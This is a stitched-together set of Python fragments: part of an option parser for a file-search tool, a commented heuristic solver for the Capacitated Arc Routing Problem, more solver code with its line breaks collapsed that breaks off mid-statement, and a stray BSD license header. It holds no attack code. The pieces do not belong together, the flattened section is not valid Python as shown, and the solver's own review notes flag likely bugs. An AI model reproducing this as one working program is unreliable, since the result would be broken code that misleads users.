("y" in self.options) and not import_warnings["yaml"][0] # self.z = ('z' in self.options) # see self.k # print(f'{self.m = }, {self.s = }, {self.r = }') self.numarg = None for opt in self.options: try: self.numarg = int(opt) except Exception as ex: # if not "invalid literal for int(" in repr(ex): # GorpLogger.error(ex) continue if self.j or self.y or self.tab or self.xl: from .jsonpath import JsonPath self.jsonpath = JsonPath(self.regex) # print(self.jsonpath) else: self.jsonpath = None # print(files) if not isinstance(files, str): # files is a list of (file/dir)names self.dirName = "" self.files = files else: # files is a directory/filename if os.path.isdir(files): # gorp from a directory self.dirName = files self.files = generateFileSet(files, self.d, self.r) else: self.dirName = "" if self.e: # 'e' option means you read files in from a JSON/YAML file use_yaml = get_ext(files) in {"yml", "yaml"} with open(files) as fhand: if use_yaml: try: import yaml self.files = yaml.safe_load(fhand) except ImportError: warn_first_import_error("yaml") else: self.files = json.load(fhand) else: # gorping a single file self.dirName = "" self.files = [files] self.resultset = {} if self.i: if self.o: def goodness_condition(line): out = [] for x in line.split(): mtch = re.fullmatch(regex, x, re.I) if mtch: out.append(mtch.string) return out self.goodness_condition = goodness_condition self.f_goodness_condition
"""Heuristic solver scaffold for the Capacitated Arc Routing Problem (CARP).

A solution ("gene") is a list of routes; a route is a list of signed task
ids.  Positive id k means serving task k in its stored (s, t) orientation,
negative id -k means the reversed orientation (see Graph.task_dic).
This section covers: instance parsing, all-pairs shortest paths, two
constructive heuristics, and three mutation/local-search operators.
"""
import sys
import queue
import random
import time
import copy
import numpy as np
from multiprocessing import Process,Queue

# Positional CLI arguments: argv[1] = instance file, argv[3] = time budget
# (seconds), argv[5] = RNG seed.  NOTE(review): argv[2]/argv[4] are skipped,
# so the launcher presumably passes flag tokens between them ("-t", "-s") --
# confirm against the invoking script.
file_path=sys.argv[1]
termin_time=sys.argv[3]
random_seed=sys.argv[5]
start=time.time()          # wall-clock anchor; all timeout checks compare against this
random.seed(random_seed)   # seeding with the raw string argument is accepted by random.seed

# Parse the instance file: split each line on tabs, then split the first tab
# field on whitespace into a token list.
f=open(file_path,encoding='utf-8')
sentimentlist = []
for line in f:
    s = line.strip().split('\t')
    slist=s[0].split()
    sentimentlist.append(slist)
f.close()

# Instance header fields; edge-data lines are recognised by a leading digit.
vertices=0
depot=0
required=0
non_required=0
vehicles=0
capacity=0
total_cost=0
edge_list=[]
for i in sentimentlist:
    if i[0]=='VERTICES':
        vertices=int(i[2])
    elif i[0]=='DEPOT':
        depot=int(i[2])
    elif i[0]=='REQUIRED':
        required=int(i[3])
    elif i[0]=='NON-REQUIRED':
        non_required=int(i[3])
    elif i[0]=='VEHICLES':
        vehicles=int(i[2])
    elif i[0]=='CAPACITY':
        capacity=int(i[2])
    elif i[0]=='TOTAL':
        total_cost=int(i[6])
    elif str.isdigit(i[0]):
        edge_list.append(i)    # raw token list: [s, t, cost, demand]


class Node(object):
    """Priority-queue entry for Dijkstra: a vertex index keyed by distance."""

    def __init__(self, dis, index):
        self.dis = dis
        self.index = index

    def __lt__(self, other):
        # Ties are broken by a coin flip so queue.PriorityQueue never has to
        # compare two Node objects directly (Node defines no __eq__/other
        # comparisons) and equal-distance orderings are randomised.
        if self.dis!=other.dis:
            return self.dis < other.dis
        elif self.dis==other.dis:
            p=np.random.rand()
            if p>0.5 :return True
            else: return False


class Edge(object):
    """An instance edge (s, t) with traversal cost c and service demand d.

    Ordered by demand (random tie-break) so a PriorityQueue of edges yields
    the smallest-demand task first.
    """

    def __init__(self, s, t ,c ,d ):
        self.s = s
        self.t = t
        self.c = c
        self.d = d

    def __lt__(self, other):
        if self.d!=other.d:
            return self.d < other.d
        elif self.d==other.d:
            p=np.random.rand()
            if p>0.5 :return True
            else: return False


class Individual(object):
    """A candidate solution: a gene plus its cached total cost q."""

    def __init__(self, gene,q):
        self.gene=gene
        self.q=q

    def __lt__(self, other):
        # Cheapest individual first in a PriorityQueue.
        return self.q < other.q


class Graph:
    """Instance graph: adjacency, all-pairs distances, and task bookkeeping.

    Key tables built in __init__:
      cost_dic[(s,t)]   -- traversal cost of edge (symmetric),
      demand_dic[(s,t)] -- service demand of edge (symmetric),
      task_dic[±k]      -- signed task id -> oriented (s,t) pair,
      id_dic[(s,t)]     -- oriented pair -> signed task id,
      _all_distance     -- (n+1)x(n+1) shortest-path matrix (1-based vertices).
    """

    def __init__(self,n_vertices,depot,required,non_required,vehicles,capacity,total_cost,edge_list):
        self._n_vertices = n_vertices
        self._depot=depot
        self._required=required
        self._non_required=non_required
        self._vehicles=vehicles
        self._capacity=capacity
        self._total_cost=total_cost
        self._edge_list=edge_list
        self._all_distance= [[0 for _ in range(n_vertices+1)] for _ in range(n_vertices+1)]
        self._adj = [[] for _ in range(n_vertices+1)]
        self.cost_dic={}
        self.demand_dic={}
        self.task_dic={}
        self.id_dic={}
        # Register every edge in both orientations; task id k / -k encode the
        # two service directions of the same edge.
        idcounter=1
        for i in self._edge_list:
            s=int(i[0])
            t=int(i[1])
            c=int(i[2])
            d=int(i[3])
            self.add_edge(s,t)
            self.add_edge(t,s)
            self.cost_dic[(s,t)]=c
            self.cost_dic[(t,s)]=c
            self.demand_dic[(s,t)]=d
            self.demand_dic[(t,s)]=d
            self.task_dic[idcounter]=(s,t)
            self.task_dic[-idcounter]=(t,s)
            self.id_dic[(s,t)]=idcounter
            self.id_dic[(t,s)]=-idcounter
            idcounter+=1
        # Earlier per-pair Dijkstra approach, superseded by Floyd-Warshall below:
        # for i in range(1,n_vertices+1):
        #     for j in range(1,n_vertices+1):
        #         self._all_distance[i][j]=self.dijkstra(i, j)
        # Initialise the distance matrix (10000000000000 acts as infinity)...
        for i in range(1,n_vertices+1):
            for j in range(1,n_vertices+1):
                if (i,j) in self.cost_dic:
                    self._all_distance[i][j]=self.cost_dic[(i,j)]
                elif i==j:
                    self._all_distance[i][j]=0
                else:
                    self._all_distance[i][j]=10000000000000
        # ...then run Floyd-Warshall to get all-pairs shortest paths.
        for k in range(1,n_vertices+1):
            for i in range(1,n_vertices+1):
                for j in range(1,n_vertices+1):
                    if self._all_distance[i][j]> self._all_distance[i][k]+self._all_distance[k][j]:
                        self._all_distance[i][j]=self._all_distance[i][k]+self._all_distance[k][j]
        # print(time.time()-start)
        # Tasks = edges with non-zero demand; kept both as Edge objects
        # (for the PriorityQueue in get_gene) and as raw lists (for get_gene2).
        self.tasklist=[]
        self.tasklist2=[]
        for i in self._edge_list:
            s=int(i[0])
            t=int(i[1])
            c=int(i[2])
            d=int(i[3])
            if d!=0:
                self.tasklist.append(Edge(s,t,c,d))
                self.tasklist2.append([s,t,c,d])

    def add_edge(self, s, t):
        """Record directed adjacency s -> t."""
        self._adj[s].append(t)

    def dijkstra(self, s ,t):
        """Shortest-path distance from s to t (lazy-deletion Dijkstra).

        NOTE(review): returns None if t is never popped (unreachable t);
        unused in the final code path (__init__ uses Floyd-Warshall instead).
        """
        S=set()    # NOTE(review): unused leftover
        visit=set()
        disdic={}
        pq = queue.PriorityQueue()
        for i in range(1,self._n_vertices+1):
            if i !=s:
                disdic[i]=1000000000000
                pq.put_nowait(Node(1000000000000,i))
            else:
                disdic[i]=0
                pq.put_nowait(Node(0,i))
        while not pq.empty():
            u = pq.get()
            u_index=u.index
            if u_index not in visit:
                if u_index==t:
                    return u.dis
                visit.add(u_index)
                for i in self._adj[u_index]:
                    if disdic[u_index]+self.cost_dic[(u_index,i)] <disdic[i]:
                        # Lazy decrease-key: push the improved entry; stale
                        # entries are skipped via the `visit` set.
                        pq.put_nowait(Node(disdic[u_index]+self.cost_dic[(u_index,i)],i))
                        disdic[i]=disdic[u_index]+self.cost_dic[(u_index,i)]

    def finish_one_task(self,s,t):
        """Cost of a depot -> (s,t) -> depot round trip serving one task."""
        cost_sum=0
        cost_sum+=self._all_distance[self._depot][t]
        cost_sum+=self._all_distance[self._depot][s]
        cost_sum+=self.cost_dic[(s,t)]
        return cost_sum

    def gene_to_string(self,gene):
        """Format a gene as the output line 's 0,(a,b),...,0,...' (0 = depot)."""
        sline='s '
        first=True
        for i in gene:
            if i==[]:
                continue    # empty routes are not printed
            first_task=True
            for j in i:
                # j=self.task_dic[j]
                task=self.task_dic[j]
                # task=j
                if first:
                    # Very first task of the whole solution: opening depot '0'.
                    addstr=f'0,({task[0]},{task[1]})'
                    sline=sline+addstr
                    first=False
                    first_task=False
                else:
                    if first_task:
                        # First task of a later route: separating depot '0'.
                        addstr=f',0,({task[0]},{task[1]})'
                        sline=sline+addstr
                        first_task=False
                    else:
                        addstr=f',({task[0]},{task[1]})'
                        sline=sline+addstr
            # Close each non-empty route with a return-to-depot '0'.
            addstr=f',0'
            sline=sline+addstr
        return sline

    def gene_to_q(self,gene):
        """Total cost of a gene formatted as the output line 'q <cost>'."""
        q=0
        for i in gene:
            now=self._depot
            for j in i:
                j=self.task_dic[j]
                # Deadhead from current position to the task head, then serve it.
                # if self._all_distance[j[0]][now]!=0:
                #     print(f'Dijkstra: go from {now} to {j[0]} and cost is {self._all_distance[j[0]][now]}')
                # print(f'Cost: go from {j[0]} to {j[1]} and cost is {self.cost_dic[j]}')
                q+=self._all_distance[j[0]][now]
                q+=self.cost_dic[j]
                now=j[1]
            # if now!= self._depot:
            #     print(f'Dijkstra: go from {now} to {self._depot} and cost is {self._all_distance[now][self._depot]}')
            q+=self._all_distance[now][self._depot]
            # print('Next_Car')
        return f'q {q}'

    def get_q(self,gene):
        """Total cost of a gene as an int (same walk as gene_to_q)."""
        q=0
        for i in gene:
            now=self._depot
            for j in i:
                j=self.task_dic[j]
                # print(f'Dijkstra: go from {now} to {j[0]} and cost is {self._all_distance[j[0]][now]}')
                # print(f'Cost: go from {j[0]} to {j[1]} and cost is {self.cost_dic[j]}')
                q+=self._all_distance[j[0]][now]
                q+=self.cost_dic[j]
                now=j[1]
            # if now!= self._depot:
            #     print(f'Dijkstra: go from {now} to {self._depot} and cost is {self._all_distance[now][self._depot]}')
            q+=self._all_distance[now][self._depot]
            # print('Next_Car')
        return q

    def gene_output(self,gene):
        """Print the solution in the expected two-line 's ...' / 'q ...' format."""
        print(self.gene_to_string(gene[:]))
        print(self.gene_to_q(gene[:]))

    def get_gene(self):
        """Constructive heuristic #1: greedy nearest-task with capacity check.

        Repeatedly pulls all still-fitting tasks (smallest demand first) as
        candidates, serves the one nearest to the current position (random
        tie-break, either orientation), and starts a new route when nothing
        fits.  Returns a list of routes of signed task ids.
        """
        tasklist=queue.PriorityQueue()
        for i in self._edge_list:
            s=int(i[0])
            t=int(i[1])
            c=int(i[2])
            d=int(i[3])
            if d!=0:
                tasklist.put_nowait(Edge(s,t,c,d))
        candidate=[]
        route=[]
        gene=[]
        now=self._depot
        task_sum=0
        while not tasklist.empty():
            # Drain tasks in ascending-demand order until one exceeds the
            # remaining capacity (that one is pushed back).
            while not tasklist.empty():
                leastd=tasklist.get()
                if leastd.d+task_sum<=self._capacity:
                    candidate.append(leastd)
                else:
                    tasklist.put_nowait(leastd)
                    break
            if len(candidate)==0:
                # Nothing fits: close the current route and restart at the depot.
                task_sum=0
                gene.append(route)
                route=[]
                now=self._depot
            else:
                # Collect all candidates at minimal deadhead distance, in
                # either orientation (True = keep stored (s,t) orientation).
                min_distance=1000000000
                min_list=[]
                for i in range(len(candidate)):
                    taski=candidate[i]
                    disx=self._all_distance[taski.s][now]
                    disy=self._all_distance[taski.t][now]
                    if disx<min_distance :
                        min_list=[]
                        min_list.append((i,True))
                        min_distance=disx
                    elif disx==min_distance:
                        min_list.append((i,True))
                        min_distance=disx
                    if disy<min_distance:
                        min_list=[]
                        min_list.append((i,False))
                        min_distance=disy
                    elif disy==min_distance:
                        min_list.append((i,False))
                        min_distance=disy
                k=random.randint(0,len(min_list)-1)
                min_index=min_list[k][0]
                min_s=min_list[k][1]
                min_task=candidate.pop(min_index)
                if not min_s:
                    # Reversed orientation chosen: swap endpoints in place.
                    temp=min_task.s
                    min_task.s=min_task.t
                    min_task.t=temp
                # Return unchosen candidates to the pool for the next round.
                for i in candidate:
                    tasklist.put_nowait(i)
                candidate=[]
                task_sum+=min_task.d
                route.append(self.id_dic[(min_task.s,min_task.t)])
                now=min_task.t
        gene.append(route)
        task_sum=0
        now=self._depot
        return gene

    def get_gene2(self):
        """Constructive heuristic #2: list-based nearest-task greedy.

        Same idea as get_gene but over plain [s,t,c,d] lists, with a random
        choice among all equally-near feasible tasks.
        NOTE(review): uses the module-global `graph` inside the sort key
        (should presumably be `self`), and sets `now=min_task[1]` even when
        the reversed orientation (t,s) was appended -- confirm intent.
        """
        tasklist=copy.deepcopy(self.tasklist2)
        route=[]
        gene=[]
        now=self._depot
        task_sum=0
        while len(tasklist)>0:
            tasklist.sort(key = lambda x:min(graph._all_distance[now][x[0]],graph._all_distance[now][x[1]]))
            min_list=[]
            min_dis=min(self._all_distance[now][tasklist[0][0]],self._all_distance[now][tasklist[0][1]])
            for i in tasklist:
                if min(self._all_distance[now][i[0]],self._all_distance[now][i[1]])==min_dis and i[3]+task_sum<self._capacity :
                    min_list.append(i)
            if min_list==[]:
                # No feasible nearest task: close the route, restart at depot.
                task_sum=0
                gene.append(route)
                route=[]
                now=self._depot
                continue
            np.random.shuffle(min_list)
            min_task=min_list[0]
            tasklist.remove(min_task)
            task_sum+=min_task[3]
            # Serve the task in whichever orientation is nearer from `now`.
            if self._all_distance[now][min_task[0]]<self._all_distance[now][min_task[1]]:
                route.append(self.id_dic[(min_task[0],min_task[1])])
            else:
                route.append(self.id_dic[(min_task[1],min_task[0])])
            now=min_task[1]
            if now==self._depot:
                # Happened to end at the depot: treat the route as closed.
                task_sum=0
                gene.append(route)
                route=[]
        gene.append(route)
        task_sum=0
        now=self._depot
        return gene

    def single_insertion(self,gene,p,k1,k2,k3):
        """Mutation: remove the task at position k2 of route k1 and, with
        probability p, reinsert it at position k3 in the best orientation
        (by local deadhead cost against its new neighbours / the depot).

        Routes of length <= 1 are left untouched (k2 forced to -1).
        NOTE(review): with probability 1-p the removed task is dropped from
        the solution entirely; callers always pass p=1 so the branch is
        unreachable in practice -- confirm before reusing with p<1.
        Mutates `gene` in place and also returns it.
        """
        routek=gene[k1]
        if len(routek)>1:
            pass
        else:
            k2=-1
        if k2!=-1:
            task_k_index=routek.pop(k2)
            task_k=self.task_dic[task_k_index]
            rp=random.random()
            if rp < p:
                if len(routek)==0:
                    insert_index=0
                    routek.append(task_k_index)
                else:
                    insert_index=k3
                    if insert_index==0:
                        # Inserting at the front: compare depot->task->successor
                        # for both orientations.
                        after=self.task_dic[routek[insert_index]]
                        disx=self._all_distance[self._depot][task_k[0]]+self.cost_dic[task_k]+self._all_distance[task_k[1]][after[0]]
                        disy=self._all_distance[self._depot][task_k[1]]+self.cost_dic[task_k]+self._all_distance[task_k[0]][after[0]]
                        if disx<disy:
                            routek.insert(insert_index,self.id_dic[task_k])
                        else:
                            routek.insert(insert_index,self.id_dic[(task_k[1],task_k[0])])
                    elif insert_index==(len(routek)-1):
                        # Inserting at the back: predecessor->task->depot.
                        before=self.task_dic[routek[insert_index]]
                        disx=self._all_distance[before[1]][task_k[0]]+self.cost_dic[task_k]+self._all_distance[task_k[1]][self._depot]
                        disy=self._all_distance[before[1]][task_k[1]]+self.cost_dic[task_k]+self._all_distance[task_k[0]][self._depot]
                        if disx<disy:
                            routek.append(self.id_dic[task_k])
                        else:
                            routek.append(self.id_dic[(task_k[1],task_k[0])])
                    else:
                        # Interior insert: predecessor->task->successor.
                        before=self.task_dic[routek[insert_index-1]]
                        after=self.task_dic[routek[insert_index]]
                        disx=self._all_distance[before[1]][task_k[0]]+self.cost_dic[task_k]+self._all_distance[task_k[1]][after[0]]
                        disy=self._all_distance[before[1]][task_k[1]]+self.cost_dic[task_k]+self._all_distance[task_k[0]][after[0]]
                        if disx<disy:
                            routek.insert(insert_index,self.id_dic[task_k])
                        else:
                            routek.insert(insert_index,self.id_dic[(task_k[1],task_k[0])])
            else:
                if routek==[]:
                    gene.pop(k1)
        return gene

    def double_insertion(self,gene,p,k1,k2,k3):
        """Mutation: remove the two consecutive tasks at k2/k2+1 of route k1
        and, with probability p, reinsert the pair at position k3 (orientation
        chosen by local deadhead cost); otherwise move the pair to a new route.

        Routes of length <= 2 are left untouched (k2 forced to -1).
        NOTE(review): when the route becomes empty only task_k_index is
        re-appended (task_k2 is dropped), and the forward-orientation insert
        places task_k2 before task_k while the reversed insert places them
        the other way round -- confirm both are intended.
        Mutates `gene` in place and also returns it.
        """
        routek=gene[k1]
        if len(routek)>2:
            pass
        else:
            k2=-1
        if k2!=-1:
            # Two pops at the same index remove adjacent tasks k2 and k2+1.
            task_k_index=routek.pop(k2)
            task_k_index2=routek.pop(k2)
            task_k=self.task_dic[task_k_index]
            task_k2=self.task_dic[task_k_index2]
            rp=random.random()
            if rp < p:
                if len(routek)==0:
                    routek.append(task_k_index)
                else:
                    insert_index=k3
                    if insert_index== 0:
                        after=self.task_dic[routek[insert_index]]
                        disx=self._all_distance[self._depot][task_k[0]]+self._all_distance[task_k2[1]][after[0]]
                        disy=self._all_distance[self._depot][task_k2[1]]+self._all_distance[task_k[0]][after[0]]
                        if disx<disy:
                            routek.insert(insert_index,self.id_dic[(task_k[0],task_k[1])])
                            routek.insert(insert_index,self.id_dic[(task_k2[0],task_k2[1])])
                        else:
                            routek.insert(insert_index,self.id_dic[(task_k2[1],task_k2[0])])
                            routek.insert(insert_index,self.id_dic[(task_k[1],task_k[0])])
                    elif insert_index==(len(routek)-1):
                        before=self.task_dic[routek[insert_index]]
                        disx=self._all_distance[before[1]][task_k[0]]+self._all_distance[task_k2[1]][self._depot]
                        disy=self._all_distance[before[1]][task_k2[1]]+self._all_distance[task_k[0]][self._depot]
                        if disx<disy:
                            routek.append(self.id_dic[(task_k[0],task_k[1])])
                            routek.append(self.id_dic[(task_k2[0],task_k2[1])])
                        else:
                            routek.append(self.id_dic[(task_k2[1],task_k2[0])])
                            routek.append(self.id_dic[(task_k[1],task_k[0])])
                    else:
                        before=self.task_dic[routek[insert_index-1]]
                        after=self.task_dic[routek[insert_index]]
                        disx=self._all_distance[before[1]][task_k[0]]+self._all_distance[task_k2[1]][after[0]]
                        disy=self._all_distance[before[1]][task_k2[1]]+self._all_distance[task_k[0]][after[0]]
                        if disx<disy:
                            routek.insert(insert_index,self.id_dic[(task_k[0],task_k[1])])
                            routek.insert(insert_index,self.id_dic[(task_k2[0],task_k2[1])])
                        else:
                            routek.insert(insert_index,self.id_dic[(task_k2[1],task_k2[0])])
                            routek.insert(insert_index,self.id_dic[(task_k[1],task_k[0])])
            else:
                # With probability 1-p the pair is moved to a brand-new route.
                if routek==[]:
                    gene.pop(k1)
                route=[]
                route.append(self.id_dic[(task_k[0],task_k[1])])
                route.append(self.id_dic[(task_k2[0],task_k2[1])])
                gene.append(route)
        return gene

    def swap(self,gene,k1,k2,k3):
        """Mutation: swap the tasks at positions k2 and k3 of route k1,
        re-orienting each swapped task to minimise local deadhead cost
        against its new neighbours (or the depot at route ends).

        Routes of length <= 2 are left untouched (k2 forced to -1).
        Mutates `gene` in place and also returns it.
        """
        routek=gene[k1]
        if len(routek)>2:
            pass
        else:
            k2=-1
        if k2!=-1:
            task_k_index=routek[k2]
            task_k_index2=routek[k3]
            task_k=self.task_dic[task_k_index]
            task_k2=self.task_dic[task_k_index2]
            # Place task_k2 at position k2 in its cheaper orientation.
            if k2==0:
                after=self.task_dic[routek[k2+1]]
                disx=self._all_distance[self._depot][task_k2[0]]+self._all_distance[task_k2[1]][after[0]]
                disy=self._all_distance[self._depot][task_k2[1]]+self._all_distance[task_k2[0]][after[0]]
                if disx<disy:
                    routek.pop(k2)
                    routek.insert(k2,self.id_dic[(task_k2[0],task_k2[1])])
                else:
                    routek.pop(k2)
                    routek.insert(k2,self.id_dic[(task_k2[1],task_k2[0])])
            elif k2== len(routek)-1:
                before=self.task_dic[routek[k2-1]]
                disx=self._all_distance[before[1]][task_k2[0]]+self._all_distance[task_k2[1]][self._depot]
                disy=self._all_distance[before[1]][task_k2[1]]+self._all_distance[task_k2[0]][self._depot]
                if disx<disy:
                    routek.pop(k2)
                    routek.insert(k2,self.id_dic[(task_k2[0],task_k2[1])])
                else:
                    routek.pop(k2)
                    routek.insert(k2,self.id_dic[(task_k2[1],task_k2[0])])
            else:
                before=self.task_dic[routek[k2-1]]
                after=self.task_dic[routek[k2+1]]
                disx=self._all_distance[before[1]][task_k2[0]]+self._all_distance[task_k2[1]][after[0]]
                disy=self._all_distance[before[1]][task_k2[1]]+self._all_distance[task_k2[0]][after[0]]
                if disx<disy:
                    routek.pop(k2)
                    routek.insert(k2,self.id_dic[(task_k2[0],task_k2[1])])
                else:
                    routek.pop(k2)
                    routek.insert(k2,self.id_dic[(task_k2[1],task_k2[0])])
            # Place task_k at position k3 in its cheaper orientation.
            if k3==0:
                after=self.task_dic[routek[k3+1]]
                disx=self._all_distance[self._depot][task_k[0]]+self._all_distance[task_k[1]][after[0]]
                disy=self._all_distance[self._depot][task_k[1]]+self._all_distance[task_k[0]][after[0]]
                if disx<disy:
                    routek.pop(k3)
                    routek.insert(k3,self.id_dic[(task_k[0],task_k[1])])
                else:
                    routek.pop(k3)
                    routek.insert(k3,self.id_dic[(task_k[1],task_k[0])])
            elif k3== len(routek)-1:
                before=self.task_dic[routek[k3-1]]
                disx=self._all_distance[before[1]][task_k[0]]+self._all_distance[task_k[1]][self._depot]
                disy=self._all_distance[before[1]][task_k[1]]+self._all_distance[task_k[0]][self._depot]
                if disx<disy:
                    routek.pop(k3)
                    routek.insert(k3,self.id_dic[(task_k[0],task_k[1])])
                else:
                    routek.pop(k3)
                    routek.insert(k3,self.id_dic[(task_k[1],task_k[0])])
            else:
                before=self.task_dic[routek[k3-1]]
                after=self.task_dic[routek[k3+1]]
                disx=self._all_distance[before[1]][task_k[0]]+self._all_distance[task_k[1]][after[0]]
                disy=self._all_distance[before[1]][task_k[1]]+self._all_distance[task_k[0]][after[0]]
                if disx<disy:
                    routek.pop(k3)
                    routek.insert(k3,self.id_dic[(task_k[0],task_k[1])])
                else:
                    routek.pop(k3)
                    routek.insert(k3,self.id_dic[(task_k[1],task_k[0])])
        return gene

    def list_2_tuple(self,lst):
        """Convert a gene (list of lists) into a hashable tuple of tuples."""
        result=[]
        for i in lst:
            ti=tuple(i)
            result.append(ti)
        return tuple(result)

    def single_local_search(self,gene):
        """Exhaustive single_insertion neighbourhood search on a deep copy per
        move; keeps the best gene found.  Aborts when the global time budget
        (`termin_time` minus a 0.5 s safety margin) is exhausted or when a
        full pass yields no improvement.
        NOTE(review): `gene` itself is never replaced by `best_gene` between
        passes, so the search converges after the second sweep -- confirm.
        """
        before=1000000
        best_q=1000000
        best_gene=gene
        time_out=False
        while True:
            if time_out:
                break
            for i in range(len(gene)):
                if time_out:
                    break
                if len(gene[i])>1:
                    for j in range(len(gene[i])):
                        if time_out:
                            break
                        for k in range(len(gene[i])-1):
                            if time.time()-start>float(termin_time)-0.5:
                                time_out=True
                            if time_out:
                                break
                            # Evaluate the move on a copy so `gene` stays intact.
                            copy_gene=copy.deepcopy(gene)
                            self.single_insertion(copy_gene,1,i,j,k)
                            q=self.get_q(copy_gene)
                            if q<best_q:
                                best_gene=copy_gene
                                best_q=q
            if best_q==before:
                break
            else:
                before=best_q
        return best_gene

    def double_local_search(self,gene):
        """Same scheme as single_local_search but over the double_insertion
        (adjacent-pair move) neighbourhood; only routes longer than 2 qualify.
        """
        before=1000000
        best_q=1000000
        best_gene=gene
        time_out=False
        while True:
            if time_out:
                break
            for i in range(len(gene)):
                if time_out:
                    break
                if len(gene[i])>2:
                    for j in range(len(gene[i])-1):
                        if time_out:
                            break
                        for k in range(len(gene[i])-2):
                            if time.time()-start>float(termin_time)-0.5:
                                time_out=True
                            if time_out:
                                break
                            copy_gene=copy.deepcopy(gene)
                            self.double_insertion(copy_gene,1,i,j,k)
                            q=self.get_q(copy_gene)
                            if q<best_q:
                                best_gene=copy_gene
                                best_q=q
            if best_q==before:
                break
            else:
                before=best_q
        return best_gene

    def swap_local_search(self,gene):
        """Same scheme as single_local_search but over the swap neighbourhood
        (all ordered position pairs j != k within each route longer than 2).
        """
        before=1000000
        best_q=1000000
        best_gene=gene
        time_out=False
        while True:
            if time_out:
                break
            for i in range(len(gene)):
                if time_out:
                    break
                if len(gene[i])>2:
                    for j in range(len(gene[i])):
                        if time_out:
                            break
                        for k in range(len(gene[i])):
                            if k!=j:
                                if time.time()-start>float(termin_time)-0.5:
                                    time_out=True
                                if time_out:
                                    break
                                copy_gene=copy.deepcopy(gene)
                                self.swap(copy_gene,i,j,k)
                                q=self.get_q(copy_gene)
                                if q<best_q:
                                    best_gene=copy_gene
                                    best_q=q
            if best_q==before:
                break
            else:
                before=best_q
        return best_gene
def Ulusoy_split(self,ordered_list): V=[0 for i in range(len(ordered_list)+1)] P=[0 for i in range(len(ordered_list)+1)] length=len(ordered_list) for i in range(1,length+1): V[i]=1000000000 for t in range(1,length+1): i=t-1 j=i load=0 cost=0 before_task=None while j<length: task=self.task_dic[ordered_list[j]] load+=self.demand_dic[task] if i==j: cost=self._all_distance[self._depot][task[0]]+self.cost_dic[task]+self._all_distance[self._depot][task[1]] else: cost=self._all_distance[before_task[1]][task[0]]+self.cost_dic[task]+self._all_distance[self._depot][task[1]]-self._all_distance[self._depot][before_task[1]] if load<=self._capacity: v_new=V[t-1]+cost if v_new<V[j+1]: V[j+1]=v_new P[j+1]=t-1 before_task=task j+=1 else: break output=[] j=length ptr=P[j] while ptr>0: route=[] for k in range(ptr,j): route.append(ordered_list[k]) output.append(route) j=ptr ptr=P[j] route=[] for k in range(0,j): route.append(ordered_list[k]) output.append(route) return output def flatten(self,gene): output=[] for i in gene: for j in i: output.append(j) return output def merge(self,gene,list): output=[] left=[] for i in range(len(gene)): if i in list: output.append(gene[i]) else: left.append(gene[i]) return output,left def MS_local_search(self,gene): min_split=None min_left=None min_score=10000000000 counter=0 for i in range(len(gene)): for j in range(i+1,len(gene)): counter+=1 if counter>100: pass else: for i in range(5): random_select,left=graph.merge(gene,[i,j]) split1=graph.Ulusoy_split(graph.PS1(copy.deepcopy(graph.flatten(random_select)))) split2=graph.Ulusoy_split(graph.PS2(copy.deepcopy(graph.flatten(random_select)))) split3=graph.Ulusoy_split(graph.PS3(copy.deepcopy(graph.flatten(random_select)))) split4=graph.Ulusoy_split(graph.PS4(copy.deepcopy(graph.flatten(random_select)))) split5=graph.Ulusoy_split(graph.PS5(copy.deepcopy(graph.flatten(random_select)))) score1=self.get_q(split1) score2=self.get_q(split2) score3=self.get_q(split3) score4=self.get_q(split4) 
score5=self.get_q(split5) if score1<min_score: min_score=score1 min_split=split1 min_left=left if score2<min_score: min_score=score2 min_split=split2 min_left=left if score3<min_score: min_score=score3 min_split=split3 min_left=left if score4<min_score: min_score=score4 min_split=split4 min_left=left if score5<min_score: min_score=score5 min_split=split5 min_left=left for i in min_left: min_split.append(i) return min_split def best_BIH(self): population=queue.PriorityQueue() gene_set=set() counter=0 misstime=0 while time.time()-start<float(termin_time): copy_gene=self.get_gene2() tuple_gene=self.list_2_tuple(copy_gene) if tuple_gene not in gene_set: counter+=1 gene_set.add(tuple_gene) new_individual=Individual(copy_gene, self.get_q(copy_gene)) population.put_nowait(new_individual) misstime=0 else: misstime+=1 if misstime>100: break best=population.get() self.gene_output(best.gene) def cross_over(self,gene1,gene2): k1=random.randint(0,len(gene1)-1) k2=random.randint(0,len(gene2)-1) # print(k1) # print(k2) R1=gene1[k1] R2=gene2[k2] # print(f'R1 is {R1}') # print(f'R2 is {R2}') while len(R1)<2: k1=random.randint(0,len(gene1)-1) R1=gene1[k1] while len(R2)<2: k2=random.randint(0,len(gene2)-1) R2=gene2[k2] s1=random.randint(1,len(R1)-1) s2=random.randint(1,len(R2)-1) R11=R1[:s1] R22=R2[s2:] new=R11+R22 miss=[] dup=[] for i in new: if i not in R1: dup.append(i) for i in R1: if
# # Copyright (c) 2018, Salesforce, Inc. # The Board of Trustees of the Leland Stanford Junior University # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # * Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
